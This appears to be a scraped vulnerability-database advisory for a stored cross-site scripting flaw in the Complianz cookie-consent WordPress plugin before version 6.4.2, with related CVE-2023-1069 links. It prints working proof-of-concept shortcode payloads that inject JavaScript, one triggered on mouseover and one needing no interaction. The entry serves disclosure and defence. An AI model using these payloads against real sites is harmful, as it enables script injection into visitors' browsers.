Lucene search
WpvulndbWPEX-ID:CAACC50C-822E-46E9-BC0B-681349FD0DDAHistoryMar 06, 2023 - 12:00 a.m.
Complianz - GDPR/CCPA Cookie Consent < 6.4.2 - Contributor+ Stored XSS
2023-03-0600:00:00
wpvulndb
138
complianz
gdpr
ccpa
cookie consent
xss
stored
interaction
category
payload
0.001 Low
EPSS
Percentile
23.3%
The plugins do not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[cmplz-consent-area service='"onmouseover=alert(/XSS-service/)//']a[/cmplz-consent-area]
[cmplz-consent-area category='"onmouseover=alert(/XSS-category/)//']a[/cmplz-consent-area]
And move the mouse over the generated link to trigger the XSS
Payload to trigger the XSS w/o interaction (the category attribute is also affected, with another payload):
[cmplz-consent-area service="')){}};alert(/XSS-service-js/); function b(){ if (cmplz_has_service_consent('a"]a[/cmplz-consent-area]Related
openvas
openvas
nvd
nvd
CVE-2023-1069
2023-03-27 16:15:09
cve
cve
CVE-2023-1069
2023-03-27 16:15:09
cvelist
cvelist
github
github
Complianz WordPress plugin vulnerable to cross-site scripting
2023-03-27 18:30:26
wpvulndb
wpvulndb
Complianz - GDPR/CCPA Cookie Consent < 6.4.2 - Contributor+ Stored XSS
2023-03-06 00:00:00
osv
osv
Complianz WordPress plugin vulnerable to cross-site scripting
2023-03-27 18:30:26
prion
prion
Cross site scripting
2023-03-27 16:15:00
wordfence
wordfence